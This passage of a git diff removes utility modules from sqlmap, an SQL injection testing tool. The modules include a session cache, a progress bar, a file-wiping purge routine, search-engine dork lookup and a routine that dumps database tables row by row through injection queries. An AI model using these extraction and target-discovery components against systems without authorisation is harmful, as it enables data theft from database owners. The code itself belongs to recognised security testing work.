" % key - warnMsg += "If the problem persists please rerun with `--flush-session`" - logger.warn(warnMsg) - - return retVal - - def write(self, key, value, serialize=False): - if key: - hash_ = HashDB.hashKey(key) - self._cache_lock.acquire() - self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) - self._cache_lock.release() - - if getCurrentThreadName() in ('0', 'MainThread'): - self.flush() - - def flush(self, forced=False): - if not self._write_cache: - return - - if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD: - return - - self._cache_lock.acquire() - _ = self._write_cache - self._write_cache = {} - self._cache_lock.release() - - try: - self.beginTransaction() - for hash_, value in _.items(): - retries = 0 - while True: - try: - try: - self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,)) - except sqlite3.IntegrityError: - self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,)) - except sqlite3.DatabaseError, ex: - if not os.path.exists(self.filepath): - debugMsg = "session file '%s' does not exist" % self.filepath - logger.debug(debugMsg) - break - - if retries == 0: - warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % getSafeExString(ex) - logger.warn(warnMsg) - - if retries >= HASHDB_FLUSH_RETRIES: - return - else: - retries += 1 - time.sleep(1) - else: - break - finally: - self.endTransaction() - - def beginTransaction(self): - threadData = getCurrentThreadData() - if not threadData.inTransaction: - try: - self.cursor.execute("BEGIN TRANSACTION") - except: - # Reference: http://stackoverflow.com/a/25245731 - self.cursor.close() - threadData.hashDBCursor = None - self.cursor.execute("BEGIN TRANSACTION") - finally: - threadData.inTransaction = True - - def endTransaction(self): - threadData = getCurrentThreadData() - if threadData.inTransaction: - retries = 0 - while retries < HASHDB_END_TRANSACTION_RETRIES: - try: - 
self.cursor.execute("END TRANSACTION") - threadData.inTransaction = False - except sqlite3.OperationalError: - pass - else: - return - - retries += 1 - time.sleep(1) - - try: - self.cursor.execute("ROLLBACK TRANSACTION") - except sqlite3.OperationalError: - self.cursor.close() - self.cursor = None - finally: - threadData.inTransaction = False diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py deleted file mode 100644 index 44c28044..00000000 --- a/lib/utils/htmlentities.py +++ /dev/null @@ -1,263 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html - -htmlEntities = { - 'quot': 34, - 'amp': 38, - 'lt': 60, - 'gt': 62, - 'nbsp': 160, - 'iexcl': 161, - 'cent': 162, - 'pound': 163, - 'curren': 164, - 'yen': 165, - 'brvbar': 166, - 'sect': 167, - 'uml': 168, - 'copy': 169, - 'ordf': 170, - 'laquo': 171, - 'not': 172, - 'shy': 173, - 'reg': 174, - 'macr': 175, - 'deg': 176, - 'plusmn': 177, - 'sup2': 178, - 'sup3': 179, - 'acute': 180, - 'micro': 181, - 'para': 182, - 'middot': 183, - 'cedil': 184, - 'sup1': 185, - 'ordm': 186, - 'raquo': 187, - 'frac14': 188, - 'frac12': 189, - 'frac34': 190, - 'iquest': 191, - 'Agrave': 192, - 'Aacute': 193, - 'Acirc': 194, - 'Atilde': 195, - 'Auml': 196, - 'Aring': 197, - 'AElig': 198, - 'Ccedil': 199, - 'Egrave': 200, - 'Eacute': 201, - 'Ecirc': 202, - 'Euml': 203, - 'Igrave': 204, - 'Iacute': 205, - 'Icirc': 206, - 'Iuml': 207, - 'ETH': 208, - 'Ntilde': 209, - 'Ograve': 210, - 'Oacute': 211, - 'Ocirc': 212, - 'Otilde': 213, - 'Ouml': 214, - 'times': 215, - 'Oslash': 216, - 'Ugrave': 217, - 'Uacute': 218, - 'Ucirc': 219, - 'Uuml': 220, - 'Yacute': 221, - 'THORN': 222, - 'szlig': 223, - 'agrave': 224, - 'aacute': 225, - 'acirc': 226, - 'atilde': 227, - 'auml': 228, - 'aring': 229, - 'aelig': 230, - 'ccedil': 231, - 'egrave': 232, - 
'eacute': 233, - 'ecirc': 234, - 'euml': 235, - 'igrave': 236, - 'iacute': 237, - 'icirc': 238, - 'iuml': 239, - 'eth': 240, - 'ntilde': 241, - 'ograve': 242, - 'oacute': 243, - 'ocirc': 244, - 'otilde': 245, - 'ouml': 246, - 'divide': 247, - 'oslash': 248, - 'ugrave': 249, - 'uacute': 250, - 'ucirc': 251, - 'uuml': 252, - 'yacute': 253, - 'thorn': 254, - 'yuml': 255, - 'OElig': 338, - 'oelig': 339, - 'Scaron': 352, - 'fnof': 402, - 'scaron': 353, - 'Yuml': 376, - 'circ': 710, - 'tilde': 732, - 'Alpha': 913, - 'Beta': 914, - 'Gamma': 915, - 'Delta': 916, - 'Epsilon': 917, - 'Zeta': 918, - 'Eta': 919, - 'Theta': 920, - 'Iota': 921, - 'Kappa': 922, - 'Lambda': 923, - 'Mu': 924, - 'Nu': 925, - 'Xi': 926, - 'Omicron': 927, - 'Pi': 928, - 'Rho': 929, - 'Sigma': 931, - 'Tau': 932, - 'Upsilon': 933, - 'Phi': 934, - 'Chi': 935, - 'Psi': 936, - 'Omega': 937, - 'alpha': 945, - 'beta': 946, - 'gamma': 947, - 'delta': 948, - 'epsilon': 949, - 'zeta': 950, - 'eta': 951, - 'theta': 952, - 'iota': 953, - 'kappa': 954, - 'lambda': 955, - 'mu': 956, - 'nu': 957, - 'xi': 958, - 'omicron': 959, - 'pi': 960, - 'rho': 961, - 'sigmaf': 962, - 'sigma': 963, - 'tau': 964, - 'upsilon': 965, - 'phi': 966, - 'chi': 967, - 'psi': 968, - 'omega': 969, - 'thetasym': 977, - 'upsih': 978, - 'piv': 982, - 'bull': 8226, - 'hellip': 8230, - 'prime': 8242, - 'Prime': 8243, - 'oline': 8254, - 'frasl': 8260, - 'ensp': 8194, - 'emsp': 8195, - 'thinsp': 8201, - 'zwnj': 8204, - 'zwj': 8205, - 'lrm': 8206, - 'rlm': 8207, - 'ndash': 8211, - 'mdash': 8212, - 'lsquo': 8216, - 'rsquo': 8217, - 'sbquo': 8218, - 'ldquo': 8220, - 'rdquo': 8221, - 'bdquo': 8222, - 'dagger': 8224, - 'Dagger': 8225, - 'permil': 8240, - 'lsaquo': 8249, - 'rsaquo': 8250, - 'euro': 8364, - 'weierp': 8472, - 'image': 8465, - 'real': 8476, - 'trade': 8482, - 'alefsym': 8501, - 'larr': 8592, - 'uarr': 8593, - 'rarr': 8594, - 'darr': 8595, - 'harr': 8596, - 'crarr': 8629, - 'lArr': 8656, - 'uArr': 8657, - 'rArr': 8658, - 'dArr': 8659, - 
'hArr': 8660, - 'forall': 8704, - 'part': 8706, - 'exist': 8707, - 'empty': 8709, - 'nabla': 8711, - 'isin': 8712, - 'notin': 8713, - 'ni': 8715, - 'prod': 8719, - 'sum': 8721, - 'minus': 8722, - 'lowast': 8727, - 'radic': 8730, - 'prop': 8733, - 'infin': 8734, - 'ang': 8736, - 'and': 8743, - 'or': 8744, - 'cap': 8745, - 'cup': 8746, - 'int': 8747, - 'there4': 8756, - 'sim': 8764, - 'cong': 8773, - 'asymp': 8776, - 'ne': 8800, - 'equiv': 8801, - 'le': 8804, - 'ge': 8805, - 'sub': 8834, - 'sup': 8835, - 'nsub': 8836, - 'sube': 8838, - 'supe': 8839, - 'oplus': 8853, - 'otimes': 8855, - 'perp': 8869, - 'sdot': 8901, - 'lceil': 8968, - 'rceil': 8969, - 'lfloor': 8970, - 'rfloor': 8971, - 'lang': 9001, - 'rang': 9002, - 'loz': 9674, - 'spades': 9824, - 'clubs': 9827, - 'hearts': 9829, - 'diams': 9830, -} diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py deleted file mode 100644 index a511000e..00000000 --- a/lib/utils/pivotdumptable.py +++ /dev/null @@ -1,188 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from extra.safe2bin.safe2bin import safechardecode -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import MAX_INT -from lib.core.unescaper import unescaper -from lib.request import inject - -def 
pivotDumpTable(table, colList, count=None, blind=True): - lengths = {} - entries = {} - - dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind - - validColumnList = False - validPivotValue = False - - if count is None: - query = dumpNode.count % table - query = whereQuery(query) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) - - if isinstance(count, basestring) and count.isdigit(): - count = int(count) - - if count == 0: - infoMsg = "table '%s' appears to be empty" % unsafeSQLIdentificatorNaming(table) - logger.info(infoMsg) - - for column in colList: - lengths[column] = len(column) - entries[column] = [] - - return entries, lengths - - elif not isNumPosStrValue(count): - return None - - for column in colList: - lengths[column] = 0 - entries[column] = BigArray() - - colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) - - if conf.pivotColumn: - for _ in colList: - if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): - infoMsg = "using column '%s' as a pivot " % conf.pivotColumn - infoMsg += "for retrieving row data" - logger.info(infoMsg) - - colList.remove(_) - colList.insert(0, _) - - validPivotValue = True - break - - if not validPivotValue: - warnMsg = "column '%s' not " % conf.pivotColumn - warnMsg += "found in table '%s'" % table - logger.warn(warnMsg) - - if not validPivotValue: - for column in colList: - infoMsg = "fetching number of distinct " - infoMsg += "values for column '%s'" % column - logger.info(infoMsg) - - query = dumpNode.count2 % (column, table) - query = whereQuery(query) - value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(value): - validColumnList = True - - if value == count: - infoMsg = "using column '%s' as a pivot " % column - 
infoMsg += "for retrieving row data" - logger.info(infoMsg) - - validPivotValue = True - colList.remove(column) - colList.insert(0, column) - break - - if not validColumnList: - errMsg = "all column name(s) provided are non-existent" - raise SqlmapNoneDataException(errMsg) - - if not validPivotValue: - warnMsg = "no proper pivot column provided (with unique values)." - warnMsg += " It won't be possible to retrieve all rows" - logger.warn(warnMsg) - - pivotValue = " " - breakRetrieval = False - - def _(column, pivotValue): - if column == colList[0]: - query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) - else: - query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) - - query = whereQuery(query) - return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) - - try: - for i in xrange(count): - if breakRetrieval: - break - - for column in colList: - value = _(column, pivotValue) - if column == colList[0]: - if isNoneValue(value): - for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): - value = _(column, pivotValue) - if not isNoneValue(value): - break - - if isNoneValue(value): - breakRetrieval = True - break - pivotValue = safechardecode(value) - - if conf.limitStart or conf.limitStop: - if conf.limitStart and (i + 1) < conf.limitStart: - warnMsg = "skipping first %d pivot " % conf.limitStart - warnMsg += "point values" - singleTimeWarnMessage(warnMsg) - break - elif conf.limitStop and (i + 1) > conf.limitStop: - breakRetrieval = True - break - - value = "" if isNoneValue(value) else unArrayizeValue(value) - - lengths[column] = max(lengths[column], 
len(value) if value else 0) - entries[column].append(value) - - except KeyboardInterrupt: - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - except SqlmapConnectionException, e: - errMsg = "connection exception detected. sqlmap " - errMsg += "will display partial output" - errMsg += "'%s'" % e - logger.critical(errMsg) - - return entries, lengths - -def whereQuery(query): - if conf.dumpWhere and query: - prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") - - if "%s)" % conf.tbl.upper() in prefix.upper(): - prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) - elif re.search(r"(?i)\bWHERE\b", prefix): - prefix += " AND %s" % conf.dumpWhere - else: - prefix += " WHERE %s" % conf.dumpWhere - - query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix - - return query diff --git a/lib/utils/progress.py b/lib/utils/progress.py deleted file mode 100644 index 06fe30f0..00000000 --- a/lib/utils/progress.py +++ /dev/null @@ -1,108 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import getUnicode -from lib.core.common import dataToStdout -from lib.core.data import conf -from lib.core.data import kb - -class ProgressBar(object): - """ - This class defines methods to update and draw a progress bar - """ - - def __init__(self, minValue=0, maxValue=10, totalWidth=None): - self._progBar = "[]" - self._oldProgBar = "" - self._min = int(minValue) - self._max = int(maxValue) - self._span = max(self._max - self._min, 0.001) - self._width = totalWidth if totalWidth else conf.progressWidth - self._amount = 0 - self._times = [] - self.update() - - def _convertSeconds(self, value): - seconds = value - minutes = seconds / 60 - seconds = seconds - (minutes * 60) - - return "%.2d:%.2d" % 
(minutes, seconds) - - def update(self, newAmount=0): - """ - This method updates the progress bar - """ - - if newAmount < self._min: - newAmount = self._min - elif newAmount > self._max: - newAmount = self._max - - self._amount = newAmount - - # Figure out the new percent done, round to an integer - diffFromMin = float(self._amount - self._min) - percentDone = (diffFromMin / float(self._span)) * 100.0 - percentDone = round(percentDone) - percentDone = min(100, int(percentDone)) - - # Figure out how many hash bars the percentage should be - allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max)) - numHashes = (percentDone / 100.0) * allFull - numHashes = int(round(numHashes)) - - # Build a progress bar with an arrow of equal signs - if numHashes == 0: - self._progBar = "[>%s]" % (" " * (allFull - 1)) - elif numHashes == allFull: - self._progBar = "[%s]" % ("=" * allFull) - else: - self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), - " " * (allFull - numHashes)) - - # Add the percentage at the beginning of the progress bar - percentString = getUnicode(percentDone) + "%" - self._progBar = "%s %s" % (percentString, self._progBar) - - def progress(self, deltaTime, newAmount): - """ - This method saves item delta time and shows updated progress bar with calculated eta - """ - - if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max: - eta = None - else: - midTime = sum(self._times) / len(self._times) - midTimeWithLatest = (midTime + deltaTime) / 2 - eta = midTimeWithLatest * (self._max - newAmount) - - self._times.append(deltaTime) - self.update(newAmount) - self.draw(eta) - - def draw(self, eta=None): - """ - This method draws the progress bar if it has changed - """ - - if self._progBar != self._oldProgBar: - self._oldProgBar = self._progBar - dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else "")) - if self._amount >= self._max: - if 
not conf.liveTest: - dataToStdout("\r%s\r" % (" " * self._width)) - kb.prependFlag = False - else: - dataToStdout("\n") - - def __str__(self): - """ - This method returns the progress bar string - """ - - return getUnicode(self._progBar) diff --git a/lib/utils/purge.py b/lib/utils/purge.py deleted file mode 100644 index ee244ee6..00000000 --- a/lib/utils/purge.py +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random -import shutil -import stat -import string - -from lib.core.common import getSafeExString -from lib.core.data import logger - -def purge(directory): - """ - Safely removes content from a given directory - """ - - if not os.path.isdir(directory): - warnMsg = "skipping purging of directory '%s' as it does not exist" % directory - logger.warn(warnMsg) - return - - infoMsg = "purging content of directory '%s'..." % directory - logger.info(infoMsg) - - filepaths = [] - dirpaths = [] - - for rootpath, directories, filenames in os.walk(directory): - dirpaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in directories]) - filepaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in filenames]) - - logger.debug("changing file attributes") - for filepath in filepaths: - try: - os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) - except: - pass - - logger.debug("writing random data to files") - for filepath in filepaths: - try: - filesize = os.path.getsize(filepath) - with open(filepath, "w+b") as f: - f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) - except: - pass - - logger.debug("truncating files") - for filepath in filepaths: - try: - with open(filepath, 'w') as f: - pass - except: - pass - - logger.debug("renaming filenames to random values") - for filepath in filepaths: - try: - os.rename(filepath, os.path.join(os.path.dirname(filepath), 
"".join(random.sample(string.ascii_letters, random.randint(4, 8))))) - except: - pass - - dirpaths.sort(cmp=lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)) - - logger.debug("renaming directory names to random values") - for dirpath in dirpaths: - try: - os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) - except: - pass - - logger.debug("deleting the whole directory tree") - os.chdir(os.path.join(directory, "..")) - - try: - shutil.rmtree(directory) - except OSError, ex: - logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, getSafeExString(ex))) diff --git a/lib/utils/search.py b/lib/utils/search.py deleted file mode 100644 index 116b3cb0..00000000 --- a/lib/utils/search.py +++ /dev/null @@ -1,195 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import httplib -import re -import socket -import urllib -import urllib2 - -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import readInput -from lib.core.common import urlencode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.enums import REDIRECTION -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import DUMMY_SEARCH_USER_AGENT -from lib.core.settings import DUCKDUCKGO_REGEX -from lib.core.settings import DISCONNECT_SEARCH_REGEX -from lib.core.settings import GOOGLE_REGEX -from lib.core.settings import 
HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import UNICODE_ENCODING -from lib.request.basic import decodePage -from lib.request.httpshandler import HTTPSHandler -from thirdparty.socks import socks - - -def _search(dork): - """ - This method performs the effective search on Google providing - the google dork and the Google session cookie - """ - - if not dork: - return None - - headers = {} - - headers[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) - headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE - - try: - req = urllib2.Request("https://www.google.com/ncr", headers=headers) - conn = urllib2.urlopen(req) - except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) - raise SqlmapConnectionException(errMsg) - - gpage = conf.googlePage if conf.googlePage > 1 else 1 - logger.info("using search result page #%d" % gpage) - - url = "https://www.google.com/search?" - url += "q=%s&" % urlencode(dork, convall=True) - url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" - url += "&start=%d" % ((gpage - 1) * 100) - - try: - req = urllib2.Request(url, headers=headers) - conn = urllib2.urlopen(req) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except Exception, ex: - warnMsg = "problem occurred 
while trying to get " - warnMsg += "an error page information (%s)" % getSafeExString(ex) - logger.critical(warnMsg) - return None - except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] - - if not retVal and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "used IP address disabling further searches" - logger.warn(warnMsg) - - if not retVal: - message = "no usable links found. What do you want to do?" - message += "\n[1] (re)try with DuckDuckGo (default)" - message += "\n[2] (re)try with Disconnect Search" - message += "\n[3] quit" - choice = readInput(message, default="1").strip().upper() - - if choice == "Q": - raise SqlmapUserQuitException - elif choice == "2": - url = "https://search.disconnect.me/searchTerms/search?" - url += "start=nav&option=Web" - url += "&query=%s" % urlencode(dork, convall=True) - url += "&ses=Google&location_option=US" - url += "&nextDDG=%s" % urlencode("/search?q=%s&setmkt=en-US&setplang=en-us&setlang=en-us&first=%d&FORM=PORE" % (urlencode(dork, convall=True), (gpage - 1) * 10), convall=True) - url += "&sa=N&showIcons=false&filterIcons=none&js_enabled=1" - regex = DISCONNECT_SEARCH_REGEX - else: - url = "https://duckduckgo.com/d.js?" 
- url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) - regex = DUCKDUCKGO_REGEX - - try: - req = urllib2.Request(url, headers=headers) - conn = urllib2.urlopen(req) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except: - errMsg = "unable to connect" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)] - - return retVal - -def search(dork): - pushValue(kb.redirectChoice) - kb.redirectChoice = REDIRECTION.YES - - try: - return _search(dork) - except SqlmapBaseException, ex: - if conf.proxyList: - logger.critical(getSafeExString(ex)) - - warnMsg = "changing proxy" - logger.warn(warnMsg) - - conf.proxy = None - - setHTTPHandlers() - return search(dork) - else: - raise - finally: - kb.redirectChoice = popValue() - -def setHTTPHandlers(): # Cross-linked function - raise NotImplementedError diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py deleted file mode 100644 index 66c4eaa4..00000000 --- a/lib/utils/sqlalchemy.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) 
-See the file 'doc/COPYING' for copying permission -""" - -import imp -import logging -import os -import sys -import warnings - -_sqlalchemy = None -try: - f, pathname, desc = imp.find_module("sqlalchemy", sys.path[1:]) - _ = imp.load_module("sqlalchemy", f, pathname, desc) - if hasattr(_, "dialects"): - _sqlalchemy = _ - warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning) -except ImportError: - pass - -try: - import MySQLdb # used by SQLAlchemy in case of MySQL - warnings.filterwarnings("error", category=MySQLdb.Warning) -except ImportError: - pass - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapFilePathException -from plugins.generic.connector import Connector as GenericConnector - -class SQLAlchemy(GenericConnector): - def __init__(self, dialect=None): - GenericConnector.__init__(self) - self.dialect = dialect - - def connect(self): - if _sqlalchemy: - self.initConnection() - - try: - if not self.port and self.db: - if not os.path.exists(self.db): - raise SqlmapFilePathException, "the provided database file '%s' does not exist" % self.db - - _ = conf.direct.split("//", 1) - conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db)) - - if self.dialect: - conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1) - - engine = _sqlalchemy.create_engine(conf.direct, connect_args={'check_same_thread':False} if self.dialect == "sqlite" else {}) - self.connector = engine.connect() - except SqlmapFilePathException: - raise - except Exception, msg: - raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % msg[0]) - - self.printConnected() - - def fetchall(self): - try: - retVal = [] - for row in self.cursor.fetchall(): - retVal.append(tuple(row)) - return retVal - except _sqlalchemy.exc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if 
hasattr(msg, "message") else msg) - return None - - def execute(self, query): - try: - self.cursor = self.connector.execute(query) - except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg) - except _sqlalchemy.exc.InternalError, msg: - raise SqlmapConnectionException(msg[1]) - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py deleted file mode 100644 index 0e0a4f03..00000000 --- a/lib/utils/timeout.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import threading - -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING - -def timeout(func, args=(), kwargs={}, duration=1, default=None): - class InterruptableThread(threading.Thread): - def __init__(self): - threading.Thread.__init__(self) - self.result = None - - def run(self): - try: - self.result = func(*args, **kwargs) - except Exception, msg: - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) - self.result = default - - thread = InterruptableThread() - thread.start() - thread.join(duration) - - if thread.isAlive(): - return default - else: - return thread.result diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py deleted file mode 100644 index 99764ff8..00000000 --- a/lib/utils/versioncheck.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sys - -PYVERSION = sys.version.split()[0] - -if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). 
For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) - -extensions = ("gzip", "ssl", "sqlite3", "zlib") -try: - for _ in extensions: - __import__(_) -except ImportError: - errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) - errMsg += "most probably because current version of Python has been " - errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" - exit(errMsg) \ No newline at end of file diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py deleted file mode 100644 index ea05df1d..00000000 --- a/lib/utils/xrange.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class xrange(object): - """ - Advanced (re)implementation of xrange (supports slice/copy/etc.) - Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/ - - >>> foobar = xrange(1, 10) - >>> 7 in foobar - True - >>> 11 in foobar - False - >>> foobar[0] - 1 - """ - - __slots__ = ['_slice'] - - def __init__(self, *args): - if args and isinstance(args[0], type(self)): - self._slice = slice(args[0].start, args[0].stop, args[0].step) - else: - self._slice = slice(*args) - if self._slice.stop is None: - raise TypeError("xrange stop must not be None") - - @property - def start(self): - if self._slice.start is not None: - return self._slice.start - return 0 - - @property - def stop(self): - return self._slice.stop - - @property - def step(self): - if self._slice.step is not None: - return self._slice.step - return 1 - - def __hash__(self): - return hash(self._slice) - - def __cmp__(self, other): - return (cmp(type(self), type(other)) or - cmp(self._slice, other._slice)) - - def __repr__(self): - return '%s(%r, %r, %r)' % (type(self).__name__, - self.start, self.stop, self.step) - - def __len__(self): - 
